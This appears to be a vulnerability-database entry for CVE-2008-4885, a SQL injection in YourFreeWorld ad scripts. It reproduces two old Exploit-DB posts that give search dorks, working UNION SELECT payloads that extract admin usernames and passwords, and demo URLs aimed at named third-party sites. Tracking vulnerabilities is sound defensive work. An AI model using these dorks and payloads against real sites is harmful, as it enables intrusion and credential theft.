CVE-2008-4885
Published: 2008-11-04
Priority: P339 · high · 7.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.05% (59.9th percentile)
SQL injection vulnerability in tr1.php in YourFreeWorld Scrolling Text Ads Script allows remote attackers to execute arbitrary SQL commands via the id parameter.
No detection rules found.
Exploit-DB
YourFreeWorld Scrolling Text Ads - SQL Injection
exploitdb·2008-11-01
---
Scrolling Text Ads ( id ) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.yourfreeworld.com/script/scrollingads.php
DorK : inurl:"tr1.php?id="
Exploit :
tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings--
Demo :
http://www.downlinegoldmine.com/scrollingtextads/tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings--
Greetz : All my friends
# milw0rm.com [2008-11-01]
Exploit-DB
YourFreeWorld Short Url & Url Tracker - SQL Injection
exploitdb·2008-11-01
---
Short Url & Url Tracker ( id ) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.yourfreeworld.com/script/shorturl.php
DorK : inurl:"tr.php?id=" Short Url & Url Tracker
Exploit :
tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Demo :
http://www.safelistadtrading.com/shorturl/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Greetz : All my friends
# milw0rm.com [2008-11-01]
No writeups or analysis indexed.
http://osvdb.org/49597
http://securityreason.com/securityalert/4541
http://www.securityfocus.com/bid/32060
http://www.vupen.com/english/advisories/2008/2983
https://www.exploit-db.com/exploits/6942
Published: 2008-11-04